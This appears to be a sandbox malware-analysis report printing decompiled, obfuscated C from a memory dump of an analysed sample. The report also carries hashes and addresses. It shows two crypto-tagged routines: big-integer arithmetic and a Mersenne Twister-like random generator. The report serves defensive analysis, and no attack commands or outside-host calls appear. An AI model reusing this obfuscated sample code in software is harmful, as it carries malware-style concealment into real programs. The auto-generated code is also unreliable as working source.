Opcode Fuzzy Hash: 4d5c229dbaf3eaa2d56b0d512ea25ef90be6aac623e9f0672f64e2720e34f3aa
Instruction Fuzzy Hash: B5E09263A436386B521089AFACC4C97FFACDE463BA3020627FA4CD36A0D1114C1886F4

Uniqueness

Uniqueness Score: -1.00%

Function 0234DA70, Relevance: .7, Instructions: 746
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0234DA70(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, signed int* _a12, void* _a16) {
				unsigned int _v20;
				signed int _v24;
				signed int* _v28;
				signed int _v32;
				signed int _v36;
				signed int* _v40;
				signed int _v44;
				signed int _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				void* _t304;
				signed int _t305;
				signed int _t309;
				void* _t311;
				signed int _t314;
				signed int _t317;
				signed int* _t319;
				signed int _t328;
				signed int _t329;
				void* _t331;
				void* _t336;
				void* _t338;
				void* _t344;
				intOrPtr _t347;
				void* _t355;
				signed int _t358;
				void* _t360;
				signed int _t366;
				signed int _t368;
				void* _t369;
				signed int _t376;
				signed int* _t377;
				signed int _t379;
				signed int _t380;
				void* _t383;
				signed int _t387;
				void* _t396;
				void* _t401;
				signed int _t408;
				void* _t409;
				void* _t410;
				void* _t412;
				intOrPtr _t414;
				void* _t415;
				signed int _t418;
				signed int _t421;
				void* _t425;
				void* _t426;
				signed char _t427;
				signed int _t432;
				intOrPtr _t434;
				signed char _t444;
				signed int _t445;
				intOrPtr _t450;
				signed int _t457;
				signed int _t459;
				signed int _t460;
				signed int* _t461;
				signed int* _t463;
				signed int _t464;
				signed int _t465;
				signed int* _t466;
				signed int _t471;
				signed int _t472;
				intOrPtr* _t475;
				signed int* _t476;
				signed int _t478;
				signed int _t479;
				signed int _t481;
				signed int* _t484;
				unsigned int _t486;
				unsigned int _t490;
				signed int _t491;
				intOrPtr _t492;
				signed int _t495;
				signed int _t498;
				signed int _t502;
				signed int _t503;
				signed int _t506;
				signed char _t507;
				intOrPtr* _t510;
				signed int _t525;
				signed int _t527;
				signed int _t532;
				signed int _t533;
				signed int _t542;
				signed int _t543;
				intOrPtr _t549;
				intOrPtr* _t551;
				signed int _t552;
				void* _t566;
				signed int _t569;
				signed int _t570;
				signed int* _t576;
				signed int _t581;
				signed int _t582;
				signed int* _t584;
				signed int _t586;
				signed int _t590;
				signed int _t592;
				signed int _t595;
				signed int _t599;
				void* _t600;
				void* _t602;
				void* _t604;
				void* _t606;
				void* _t621;
				void* _t629;
				void* _t632;
				void* _t633;
				void* _t634;
				void* _t635;

				_t532 = __edx;
				_t455 = _a12;
				_t584 = E0234EC10();
				_v28 = E0234EC10();
				_t549 = E0234EC10();
				_v68 = E0234EC10();
				_v40 = E0234EC10();
				_v80 = E0234EC10();
				_t304 = E0234E3C0(__ecx, __eflags, _a12, _a16);
				_t602 = _t600 - 0x70 + 8;
				if(_t304 == 0) {
					_t305 = E0234EBE0(_t455);
					_t602 = _t602 + 4;
					__eflags = _t305;
					if(_t305 == 0) {
						_v64 = _t549;
						_v52 = _t584;
						_t457 =  *_a16;
						__eflags = _t457 - 1;
						if(__eflags != 0) {
							_v24 =  *_a12;
							_t490 = E02331460(__eflags,  *_a12 - 0x1a86f375, 0x1a86f376);
							_t309 = _a4;
							_v44 = _t457;
							_v20 = _t490;
							_t56 = _t490 + 0x3df43c37; // 0x3df43c37
							_t311 = E023322E0(__eflags, _t56, _t457);
							_t604 = _t602 + 0x10;
							_t459 = _t311 + 0xc20bc3c9;
							__eflags =  *((intOrPtr*)(_t309 + 4)) - _t459;
							if( *((intOrPtr*)(_t309 + 4)) < _t459) {
								_t432 = _a4;
								_t581 = _t432;
								 *(_t432 + 4) = _t459;
								_t434 = E02333F90( *((intOrPtr*)(_t581 + 8)), _t459 * 4);
								_t604 = _t604 + 8;
								 *((intOrPtr*)(_t581 + 8)) = _t434;
							}
							_t551 = _v28;
							E02337D70(_a12, _t551);
							E02337D70(_a16, _t584);
							_t606 = _t604 + 0x10;
							_t314 =  *_t584;
							_t491 = _t584[2];
							_v32 = _t459;
							__eflags =  *(_t491 + _t314 * 4 - 4);
							if( *(_t491 + _t314 * 4 - 4) < 0) {
								_v56 = 0;
								_t460 = 1;
								goto L25;
							} else {
								_t525 = 0;
								__eflags = 0;
								_t481 = 1;
								do {
									_v56 = (_t525 << 0x00000020 | _t481) << 1;
									_v60 = _t481 + _t481;
									E0234E320(_t584, 0x2352028);
									_t425 = E02331460(__eflags, E02339D50(0xfa78285f) +  *_t584, 0xffffffff);
									_t426 = E02339D50(0xfa78285f);
									_t481 = _v60;
									_t427 = E02336BB0(__eflags,  *((intOrPtr*)(_t584[2] + (_t425 - _t426) * 4)), 0xffffffff);
									_t525 = _v56;
									_t606 = _t606 + 0x20;
									__eflags = _t427 & 0x00000001;
								} while ((_t427 & 0x00000001) != 0);
								__eflags = _t481 | _t525;
								if((_t481 | _t525) == 0) {
									_t551 = _v28;
									_t460 = 0;
									__eflags = 0;
									_v56 = 0;
								} else {
									E0234E610(_v64, _t481);
									_t551 = _v28;
									E0234E320(_t551, _v64);
									_t606 = _t606 + 0x10;
								}
								L25:
								_t492 =  *_t551;
								__eflags = _t492 - _v20;
								if(_t492 != _v20) {
									_t576 = _v28;
									_t418 = _t492 + 1;
									 *_t576 = _t418;
									__eflags = _t492 - _t576[1];
									if(_t492 >= _t576[1]) {
										_t576[1] = _t418;
										__eflags = _t418 << 2;
										_t421 = E02333F90(_t576[2], _t418 << 2);
										_t606 = _t606 + 8;
										_t576[2] = _t421;
									}
									 *((intOrPtr*)(_t576[2] + _v24 * 4)) = 0;
								}
								_v60 = _t460;
								_t461 = _v28;
								__eflags = _v32;
								if(__eflags <= 0) {
									L53:
									_t317 = _a4;
									_t533 = _t317;
									_t495 =  *_a12 -  *_a16;
									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 8)) + _t495 * 4)) - 1;
									asm("sbb ecx, 0xffffffff");
									 *_t533 = _t495;
									_t586 =  *_t461;
									__eflags = _t586;
									if(_t586 <= 0) {
										__eflags = 0;
										L58:
										_t319 = _v28;
										 *_t319 = 0;
										_t463 = _t319;
										E02337D70(_t319, _a8);
										_t584 = _v52;
										_t549 = _v64;
										L6:
										_push(_t549);
										E0234EBC0();
										_push(_v68);
										E0234EBC0();
										_push(_v40);
										E0234EBC0();
										_push(_t463);
										E0234EBC0();
										_push(_t584);
										E0234EBC0();
										_push(_v80);
										return E0234EBC0();
									}
									_t464 = 0;
									_v24 = _t461[2];
									_t328 = 0;
									__eflags = 0;
									do {
										_t552 = _v24;
										_v32 =  *(_t552 + _t586 * 4 - 4);
										_t329 = E02343860( *(_t552 + _t586 * 4 - 4), _t328, _v60, _v56);
										__eflags = _t329;
										 *(_t552 + _t586 * 4 - 4) = _t329;
										_t535 =  !=  ? _t586 : _t464;
										__eflags = _t464;
										_t464 =  ==  ?  !=  ? _t586 : _t464 : _t464;
										_t498 = _t533 * _v60;
										_t533 = (_t329 * _v60 >> 0x20) + _t329 * _v56;
										_t331 = E02331A50(0, 0, _t329 * _v60, _t498 + _t533);
										_t606 = _t606 + 0x10;
										_t328 = _t331 + _v32;
										_t586 = _t586 - 1;
										__eflags = _t586;
									} while (_t586 > 0);
									goto L58;
								} else {
									_t465 = _v44;
									_v112 = E02331460(__eflags, _t465, 0xffffffff);
									_v96 = _t465 + 1;
									_v92 = 4 + _t465 * 4;
									_t336 = E02331460(__eflags, _v24, 0xa8f61def);
									_v20 = _v24 + 1;
									_t338 = E023322E0(__eflags, _v24 + 0x9ecacfc6, _t465);
									_v104 = E02339D50(0x5413097) + _t338;
									E023322E0(__eflags, _v20, _t465);
									_t344 = E023322E0(__eflags, E02331460(__eflags, _t465, 0xbfefafd5) + 1, 0xbfefafd5);
									E02331460(__eflags, _t465, 1);
									_t621 = _t606 + 0x3c;
									_t466 = _v28;
									_v100 = _t465 + 0x18a13f73;
									_t347 = 0;
									_v88 = _t344 + 0x3baa12e3;
									_v108 = _t336 - _t465 + 0x5709e211;
									_t590 = _v32;
									do {
										_v120 = _t347;
										_v116 = _v108 - _t347;
										E02331460(__eflags, _t590, 0xffffffff);
										_v84 = _t590;
										_v36 =  *((intOrPtr*)(_t466 + 8));
										_v76 = E023322E0(__eflags, _v100 + _t590, 0x18a13f74);
										_v32 = _t590 - 1;
										E02331460(__eflags, _t590 - 1, _v44);
										_t355 = E023313C0(E023322E0(__eflags, 0, 0xffffffff), 0,  *((intOrPtr*)(_v36 + _t352 * 4)),  *((intOrPtr*)(_v36 + (_t352 - _t354) * 4)), 0);
										_t502 = _v52[2];
										_t592 =  *(_t502 + _v112 * 4);
										_v72 = _t502;
										_t358 = E02343860(_t355, _t532, _t592, 0);
										__eflags = _t358 - 0xffffffff;
										_t503 = _t532;
										_v124 = _t592;
										asm("sbb edx, 0x0");
										_t538 =  <  ? _t503 : 0;
										_v20 =  <  ? _t503 : 0;
										_t540 =  <  ? _t358 : 0xffffffff;
										_v24 =  <  ? _t358 : 0xffffffff;
										_t542 = (_t358 * _t592 >> 0x20) + _t503 * _t592;
										asm("adc ebx, 0x2892411f");
										_t360 = E02331A50(_t355 + 0xd2627799, _t532, _t358 * _t592, _t542);
										_t471 = _t360 - E02332070(0xb6167735, 0xa7951915);
										asm("sbb esi, edx");
										_v48 = _t542;
										_v72 =  *((intOrPtr*)(_v72 + _v44 * 4 - 8));
										__eflags = _v76 + 0x6e556da6;
										_t366 = E02331460(_v76 + 0x6e556da6, _v76 + 0x6e556da6, 0xfffffffe);
										_t506 = _v20;
										_t629 = _t621 + 0x50;
										_t543 = _v36;
										_v128 =  *((intOrPtr*)(_t543 + 0x46aa4968 + _t366 * 4));
										_t368 = _v24;
										while(1) {
											_v20 = _t506;
											_v24 = _t368;
											_t369 = E02333A30(_t368, _t506, _v72, 0);
											_v36 = _t543;
											_t507 = E02332070(0x6474008c, 0x8f07580a);
											_v76 = _t471;
											_t472 = _t471 << _t507;
											__eflags = _t507 & 0x00000020;
											_t566 =  !=  ? _t472 : (_v48 << 0x00000020 | _t471) << _t507;
											_t473 =  !=  ? 0 : _t472;
											_t474 = ( !=  ? 0 : _t472) | _v128;
											_t376 = E02332070(0x6474008c, 0x8f07580a);
											_t632 = _t629 + 0x20;
											__eflags = (( !=  ? 0 : _t472) | _v128) - _t369;
											asm("sbb edi, [ebp-0x20]");
											if((( !=  ? 0 : _t472) | _v128) >= _t369) {
												break;
											}
											_t415 = E02332070(0x393c8f08, 0xec16389c);
											_t569 = _t543;
											asm("adc edi, ecx");
											_t595 = _t415 + _v24 + 0xa2b7705b;
											asm("adc edi, 0x9cee9f69");
											E02331750(__eflags, _v24, _v20, 0xffffffff, 0xffffffff);
											_t629 = _t632 + 0x18;
											_t368 = _t595;
											_t506 = _t569;
											_t471 = _v76 + _v124;
											__eflags = _t471;
											asm("adc dword [ebp-0x2c], 0x0");
											if(_t471 == 0) {
												continue;
											}
											L37:
											_t509 = _v80;
											_t475 = _v40;
											__eflags = _t569 - 1;
											asm("sbb edx, 0x0");
											_t377 =  *(_t509 + 8);
											 *_t377 = _t595;
											_t377[1] = _t569;
											 *_t509 = 2;
											E0234E690(_t569 - 1, _v68, _v52, _t509);
											_t633 = _t632 + 0xc;
											_t379 = _v44;
											__eflags = _t379 -  *((intOrPtr*)(_t475 + 4));
											if(_t379 >=  *((intOrPtr*)(_t475 + 4))) {
												 *((intOrPtr*)(_t475 + 4)) = _v96;
												_t414 = E02333F90( *((intOrPtr*)(_t475 + 8)), _v92);
												_t633 = _t633 + 8;
												 *((intOrPtr*)(_t475 + 8)) = _t414;
												_t379 = _v44;
											}
											__eflags = _t379;
											 *_t475 = 0;
											if(__eflags < 0) {
												L44:
												_t476 = _v40;
												_t380 = E0234E3C0(_t509, __eflags, _t476, _v68);
												_t634 = _t633 + 8;
												__eflags = _t380;
												if(_t380 != 0) {
													E0234E380(_t476, _v52);
													_t401 = E02339D50(0x11f2bfb2);
													_t634 = _t634 + 0xc;
													_t595 = _t595 + _t401 - 0x7586bf1f;
												}
												E0234E650(_t476, _v68);
												_t635 = _t634 + 8;
												_t570 =  *_t476;
												__eflags = _t570;
												if(_t570 > 0) {
													_t478 = 0;
													__eflags = 1;
													_v36 = 1 - _v84;
													_v20 = _v40[2];
													_v48 = _v28[2];
													0;
													0;
													do {
														_v24 =  *((intOrPtr*)(_v20 + _t478 * 4));
														_t396 = E023322E0(__eflags, 0, _t478);
														E02331460(__eflags, _t478, _v32);
														_t635 = _t635 + 0x10;
														_t478 = _t478 + 1;
														 *((intOrPtr*)(_v48 - (_t396 + _v36 << 2))) = _v24;
														_t570 =  *_v40;
														__eflags = _t478 - _t570;
													} while (__eflags < 0);
												}
												goto L49;
											} else {
												_t479 = 0;
												_v24 = _v28[2];
												_v20 = _v40[2];
												do {
													_t509 = _v24;
													_t408 =  *(_v24 + (_v32 + _t479) * 4);
													__eflags = _t408;
													 *(_v20 + _t479 * 4) = _t408;
													if(__eflags != 0) {
														_t412 = E023322E0(__eflags, 0, _t479);
														_t633 = _t633 + 8;
														_t509 = 1 - _t412;
														 *_v40 = 1 - _t412;
													}
													_t409 = E023322E0(__eflags, _t479, 0x19c77e59);
													_t410 = E02339D50(0x7db37ef5);
													E02331460(__eflags, _t479, 1);
													_t633 = _t633 + 0x14;
													__eflags = _t479 - _v44;
													_t479 = _t409 + _t410 + 1;
												} while (__eflags != 0);
												goto L44;
											}
										}
										_t595 = _v24;
										__eflags = _t376 & 0x00000020;
										_t569 =  ==  ? (_v20 << 0x00000020 | _t595) >> _t376 : _v20 >> _t376;
										goto L37;
										L49:
										__eflags = _t570 - _v44;
										if(_t570 <= _v44) {
											_t387 = E02331460(__eflags, _t570 - E02339D50(0x1f4aa581), _v116);
											__eflags = _v88 - _t570;
											E02343580(_v28[2] + _t387 * 4 - 0x13056b4c, 0, 0x1157b474 + (_v88 - _t570) * 4);
											_t635 = _t635 + 0x18;
										}
										_t510 = _a4;
										_t532 = _v84;
										__eflags = _t595;
										_t461 = _v28;
										 *( *((intOrPtr*)(_t510 + 8)) + _t532 * 4 - 4) = _t595;
										_t590 = _v32;
										if(_t595 != 0) {
											 *_t510 = _t590;
										}
										_t383 = E02339D50(0xf239476a);
										_t606 = _t635 + 4;
										_t347 = _v120 - _t383 + 0x964d47c7;
										__eflags = _t347 - _v104;
									} while (__eflags != 0);
									goto L53;
								}
							}
						}
						_t484 = _a12;
						_t527 = _a4;
						_t582 =  *_t484;
						__eflags =  *(_t527 + 4) - _t582;
						if( *(_t527 + 4) < _t582) {
							 *(_t527 + 4) = _t582;
							__eflags = _t582 << E02339D50(0x647400ae);
							_t450 = E02333F90( *((intOrPtr*)(_a4 + 8)), _t582 << E02339D50(0x647400ae));
							_t527 = _a4;
							_t602 = _t602 + 0xc;
							 *((intOrPtr*)(_t527 + 8)) = _t450;
							_t582 =  *_t484;
						}
						__eflags = _t582;
						if(_t582 <= 0) {
							__eflags = 0;
							goto L22;
						} else {
							_t486 = 0;
							_t599 = 0;
							__eflags = 0;
							_v48 = _t484[2];
							_v36 =  *((intOrPtr*)(_t527 + 8));
							_v32 =  *((intOrPtr*)(_a16 + 8));
							0;
							0;
							do {
								_v20 = _t486;
								_v24 =  *((intOrPtr*)(_v48 + _t582 * 4 - 4));
								 *((intOrPtr*)(_v36 + _t582 * 4 - 4)) = E02343860( *((intOrPtr*)(_v48 + _t582 * 4 - 4)), _t599,  *_v32, 0);
								_t444 = E02335920(_v36, _t443, 0);
								_t602 = _t602 + 8;
								__eflags = _t444 & 0x00000001;
								_t445 = _v20;
								_t487 =  !=  ? _t582 : _t486;
								__eflags = _t445;
								_t486 =  !=  ? _t445 :  !=  ? _t582 : _t486;
								_t599 = E02342E20(_v24, _t599,  *_v32, 0);
								_t582 = _t582 - 1;
								__eflags = _t582;
							} while (_t582 > 0);
							L22:
							_t549 = _v64;
							E0234E610(_a8, 0);
							_t584 = _v52;
							 *_a4 = 0;
							L5:
							_t463 = _v28;
							goto L6;
						}
					}
					 *_a4 = 0;
					E0234E610(_a8, 0);
					L4:
					goto L5;
				}
				 *_a4 = 0;
				E02337D70(_t455, _a8);
				goto L4;
			}

0x0234da70
0x0234da79
0x0234da81
0x0234da88
0x0234da90
0x0234da97
0x0234da9f
0x0234daa7
0x0234daae
0x0234dab3
0x0234dab8
0x0234dacf
0x0234dad4
0x0234dad7
0x0234dad9
0x0234db38
0x0234db3b
0x0234db3e
0x0234db40
0x0234db43
0x0234dc09
0x0234dc20
0x0234dc22
0x0234dc25
0x0234dc28
0x0234dc2e
0x0234dc36
0x0234dc3b
0x0234dc40
0x0234dc46
0x0234dc48
0x0234dc4a
0x0234dc4d
0x0234dc4f
0x0234dc5d
0x0234dc62
0x0234dc65
0x0234dc65
0x0234dc68
0x0234dc6f
0x0234dc7b
0x0234dc80
0x0234dc83
0x0234dc85
0x0234dc88
0x0234dc8b
0x0234dc90
0x0234dd44
0x0234dd4b
0x00000000
0x0234dc96
0x0234dc96
0x0234dc96
0x0234dc98
0x0234dca0
0x0234dca6
0x0234dca9
0x0234dcb2
0x0234dcd1
0x0234dce0
0x0234dcef
0x0234dcf2
0x0234dcf7
0x0234dcfa
0x0234dcfd
0x0234dcfd
0x0234dd03
0x0234dd05
0x0234dd52
0x0234dd55
0x0234dd55
0x0234dd57
0x0234dd07
0x0234dd0c
0x0234dd15
0x0234dd19
0x0234dd1e
0x0234dd1e
0x0234dd5e
0x0234dd61
0x0234dd63
0x0234dd65
0x0234dd67
0x0234dd6a
0x0234dd6d
0x0234dd6f
0x0234dd72
0x0234dd74
0x0234dd77
0x0234dd7e
0x0234dd83
0x0234dd86
0x0234dd86
0x0234dd8f
0x0234dd8f
0x0234dd99
0x0234dd9c
0x0234dd9f
0x0234dda1
0x0234e285
0x0234e288
0x0234e290
0x0234e295
0x0234e297
0x0234e29b
0x0234e29e
0x0234e2a0
0x0234e2a2
0x0234e2a4
0x0234e300
0x0234e302
0x0234e302
0x0234e305
0x0234e307
0x0234e30d
0x0234e315
0x0234e318
0x0234daf4
0x0234daf4
0x0234daf5
0x0234dafd
0x0234db00
0x0234db08
0x0234db0b
0x0234db13
0x0234db14
0x0234db1c
0x0234db1d
0x0234db25
0x0234db34
0x0234db34
0x0234e2a9
0x0234e2ab
0x0234e2ae
0x0234e2ae
0x0234e2b0
0x0234e2b0
0x0234e2b7
0x0234e2c2
0x0234e2c9
0x0234e2cd
0x0234e2d3
0x0234e2d6
0x0234e2d8
0x0234e2e2
0x0234e2e6
0x0234e2f0
0x0234e2f5
0x0234e2f8
0x0234e2fb
0x0234e2fb
0x0234e2fb
0x00000000
0x0234dda7
0x0234dda9
0x0234ddb5
0x0234ddbb
0x0234ddc5
0x0234ddd3
0x0234dde6
0x0234ddeb
0x0234de04
0x0234de0b
0x0234de28
0x0234de35
0x0234de3a
0x0234de45
0x0234de54
0x0234de57
0x0234de59
0x0234de5c
0x0234de5f
0x0234de92
0x0234de95
0x0234de9d
0x0234dea3
0x0234deae
0x0234deb1
0x0234dec9
0x0234decf
0x0234ded3
0x0234def7
0x0234df06
0x0234df0c
0x0234df0f
0x0234df17
0x0234df1c
0x0234df1f
0x0234df21
0x0234df24
0x0234df2c
0x0234df2f
0x0234df37
0x0234df3d
0x0234df42
0x0234df4a
0x0234df54
0x0234df72
0x0234df7a
0x0234df7c
0x0234df83
0x0234df89
0x0234df91
0x0234df96
0x0234df99
0x0234df9c
0x0234dfa6
0x0234dfa9
0x0234dfb0
0x0234dfb5
0x0234dfb9
0x0234dfbd
0x0234dfcc
0x0234dfe1
0x0234dfe3
0x0234dfee
0x0234dff0
0x0234dff3
0x0234dff6
0x0234dffe
0x0234e008
0x0234e00d
0x0234e010
0x0234e012
0x0234e015
0x00000000
0x00000000
0x0234e021
0x0234e031
0x0234e035
0x0234e037
0x0234e03d
0x0234e049
0x0234e04e
0x0234e054
0x0234e056
0x0234e058
0x0234e058
0x0234e05b
0x0234e05f
0x00000000
0x00000000
0x0234e084
0x0234e084
0x0234e087
0x0234e08a
0x0234e092
0x0234e095
0x0234e098
0x0234e09a
0x0234e09d
0x0234e0a6
0x0234e0ab
0x0234e0ae
0x0234e0b1
0x0234e0b4
0x0234e0b9
0x0234e0c2
0x0234e0c7
0x0234e0ca
0x0234e0cd
0x0234e0cd
0x0234e0d0
0x0234e0d2
0x0234e0d8
0x0234e170
0x0234e173
0x0234e177
0x0234e17c
0x0234e17f
0x0234e181
0x0234e187
0x0234e194
0x0234e199
0x0234e19c
0x0234e19c
0x0234e1a7
0x0234e1ac
0x0234e1af
0x0234e1b1
0x0234e1b3
0x0234e1bd
0x0234e1bf
0x0234e1c5
0x0234e1c8
0x0234e1d1
0x0234e1da
0x0234e1de
0x0234e1e0
0x0234e1e6
0x0234e1ec
0x0234e1fd
0x0234e202
0x0234e20e
0x0234e211
0x0234e216
0x0234e218
0x0234e218
0x0234e1e0
0x00000000
0x0234e0de
0x0234e0e1
0x0234e0e6
0x0234e0ef
0x0234e133
0x0234e136
0x0234e13e
0x0234e141
0x0234e143
0x0234e146
0x0234e14b
0x0234e150
0x0234e15b
0x0234e15d
0x0234e15d
0x0234e106
0x0234e115
0x0234e124
0x0234e129
0x0234e12c
0x0234e12f
0x0234e12f
0x00000000
0x0234e133
0x0234e0d8
0x0234e070
0x0234e07f
0x0234e081
0x00000000
0x0234e21c
0x0234e21c
0x0234e21f
0x0234e23c
0x0234e24e
0x0234e25b
0x0234e260
0x0234e260
0x0234e263
0x0234e266
0x0234e269
0x0234e26b
0x0234e271
0x0234e275
0x0234e278
0x0234e27e
0x0234e27e
0x0234de75
0x0234de7a
0x0234de84
0x0234de89
0x0234de89
0x00000000
0x0234de92
0x0234dda1
0x0234dc90
0x0234db49
0x0234db4c
0x0234db4f
0x0234db51
0x0234db54
0x0234db56
0x0234db68
0x0234db71
0x0234db76
0x0234db79
0x0234db7c
0x0234db7f
0x0234db7f
0x0234db81
0x0234db83
0x0234dd25
0x00000000
0x0234db89
0x0234db8f
0x0234db91
0x0234db91
0x0234db93
0x0234db99
0x0234db9f
0x0234dba8
0x0234dbac
0x0234dbb0
0x0234dbb3
0x0234dbba
0x0234dbce
0x0234dbd5
0x0234dbda
0x0234dbdd
0x0234dbdf
0x0234dbe2
0x0234dbe5
0x0234dbe7
0x0234dbfa
0x0234dbfc
0x0234dbfc
0x0234dbfc
0x0234dd27
0x0234dd27
0x0234dd2f
0x0234dd3a
0x0234dd3d
0x0234daf1
0x0234daf1
0x00000000
0x0234daf1
0x0234db83
0x0234dade
0x0234dae9
0x0234daee
0x00000000
0x0234daee
0x0234dabd
0x0234dac7
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d501fc97d7290b5d1492819f7966a5ad0b2e9701dac4fd61dfc80415239239ae
Instruction ID: 49791822b1d46c30fa81f91d16008f338430875c6510ead5c727cdcb1f73a71d
Opcode Fuzzy Hash: d501fc97d7290b5d1492819f7966a5ad0b2e9701dac4fd61dfc80415239239ae
Instruction Fuzzy Hash: 334282B5E002099FCB11DFA8DC81AAEB7F6BF49314F144169E819A7351EB31AD11CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02345BF0, Relevance: .3, Instructions: 307
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E02345BF0(void* __eflags) {
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				void* _t48;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t57;
				void* _t60;
				unsigned int _t64;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t86;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				void* _t103;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				signed int _t111;
				signed int _t120;
				signed int _t121;
				signed int _t128;
				signed int _t131;
				signed int _t169;
				void* _t179;
				signed int _t183;
				signed int _t188;
				signed int _t194;
				void* _t195;
				void* _t196;
				signed int _t237;

				_t169 =  *0x2354194; // 0x1
				_t48 = E02339D50(0x647402c3);
				_t196 = _t195 + 4;
				_t234 = _t169 - _t48;
				if(_t169 > _t48) {
					_t179 = 0xfffffc74;
					0;
					do {
						_v24 = E023320A0(_t234,  *(_t179 + 0x2353b60), 0xffffffff);
						_t69 = E02339D50(0xe47400ac);
						_t71 = E023320A0(_t234, E02339D50(0x5c38c288), 0xffffffff);
						_t74 = E02333750(_t234,  !(E02332DC0(_t234, _v24,  !_t69)), _t71 | 0x384cc224);
						_t196 = _t196 + 0x28;
						 *(_t179 + 0x2353b60) =  *(0x2350434 + ( *(_t179 + 0x2353b64) & 0x00000001) * 4) ^  *(_t179 + 0x2354194) ^ ( *(_t179 + 0x2353b64) & 0x7ffffffe | _t74) >> 0x00000001;
						_t179 = _t179 + 4;
						_t235 = _t179;
					} while (_t179 != 0);
					_t75 = 0xe3;
					_t120 = 0xe3;
					0;
					do {
						_v24 = _t75;
						_v20 = 0x23537d4[_t75];
						_t77 = E02339D50(0xe47400ac);
						_t78 = E02332DC0(_t235, 0xe98fe736, 0x167018c9);
						_t121 = _t120 - E02339D50(0xdd67dd4);
						_v36 = _t121 + 0x69a27d79;
						_v20 =  *((intOrPtr*)(_t121 * 4 - 0x5740d248));
						_t81 = E023320A0(_t235, 0x7ffffffe, 0xffffffff);
						E02333750(_t235, _v20, 0x7ffffffe);
						_v28 =  !(_t78 & _v20 & _t77);
						_t86 = E02339D50(0x58908707);
						_v28 = E02332DC0(_t235, E023320A0(_t235,  !_t81 & _v20 & 0xc31b7854 | _t86 &  !( !_t81 & _v20), _t78 & _v20 & _t77 & 0xc31b7854 | E02339D50(0x58908707) & _v28),  !_t81 & _v20 & _t78 & _v20 & _t77);
						E02332DC0(_t235,  !_t81 & _v20, _t78 & _v20 & _t77);
						E02339D50(0x9b8bffb1);
						_v28 = _v28 >> 1;
						_t128 =  *(0x2353448 + _v24 * 4);
						_v32 = _t128;
						_t183 =  *(0x2350434 + (_v20 & 0x00000001) * 4);
						_v20 = _t183;
						_t97 = E023320A0(_t235, 0xc62da7e4, 0xffffffff);
						_t98 = E02333750(_t235, _v32, _t97);
						_t120 = _v36;
						_t188 = (_t98 |  !_t128 & 0xc62da7e4) ^ (_t97 & _v20 |  !_t183 & 0xc62da7e4);
						E023320A0(_t235, _v20, _v32);
						_t100 = _v28;
						E023320A0(_t235, _t188, _t100);
						0x23537d4[_v24] = _t188 ^ _t100;
						_t103 = E02339D50(0x647402c3);
						_t196 = _t196 + 0x68;
						_t236 = _t120 - _t103;
						_t75 = _t120;
					} while (_t120 != _t103);
					_t104 = E02333750(_t236,  *0x2354190, 0x80000000);
					_t131 =  *0x23537d4; // 0x9b3022f7
					_t105 = E02339D50(0x1b8bff52);
					_v24 = _t131;
					_t106 = E023320A0(_t236, _t131, 0xffffffff);
					_t107 = E023320A0(_t236, 1, 0xffffffff);
					_t111 = E02333750(_t236,  !(_t107 | _t106), (E02339D50(0x72976c99) | 0x16e36c35) ^ 0xe91c93ca);
					E02333750(_t236, _v24, 1);
					_t196 = _t196 + 0x30;
					_t194 = (_t105 & _t131 | _t104) >> 0x00000001 ^  *0x2353e04 ^  *(0x2350434 + _t111 * 4);
					_t237 = _t194;
					 *0x2354194 = 0;
					 *0x2354190 = _t194;
				}
				_t49 =  *0x2354194; // 0x1
				_t150 = 0x23537d4[_t49];
				_t47 = _t49 + 1; // 0x2
				 *0x2354194 = _t47;
				_t50 = E023320A0(_t237, 0x23537d4[_t49], 0xffffffff);
				_t51 = E02339D50(0x209e1c2b);
				E023320A0(_t237, _t150 >> 0xb, _t150);
				_t57 = E023320A0(_t237, ((_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87) << 0x00000007 & 0x9d2c5680, (_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87);
				E02339D50(0x8bb200ac);
				_t60 = E02333750(_t237, E023320A0(_t237, _t57, 0xffffffff), 0x33945623);
				_t64 = E02332DC0(_t237, _t60, E02333750(_t237, _t57, 0xcc6ba9dc)) ^ _t57 << 0x0000000f & 0xefc60000 ^ 0x33945623;
				return E023320A0(_t237, _t64, 0xffffffff) & _t64 >> 0x00000012 |  !(_t64 >> 0x12) & _t64;
			}

0x02345bf9
0x02345c04
0x02345c09
0x02345c0c
0x02345c0e
0x02345c14
0x02345c1f
0x02345c20
0x02345c30
0x02345c38
0x02345c54
0x02345c74
0x02345c79
0x02345ca0
0x02345ca6
0x02345ca6
0x02345ca6
0x02345caf
0x02345cb4
0x02345cbc
0x02345cc0
0x02345cc0
0x02345cca
0x02345cd2
0x02345ce6
0x02345d02
0x02345d11
0x02345d14
0x02345d1e
0x02345d35
0x02345d45
0x02345d4d
0x02345d93
0x02345d98
0x02345da5
0x02345db0
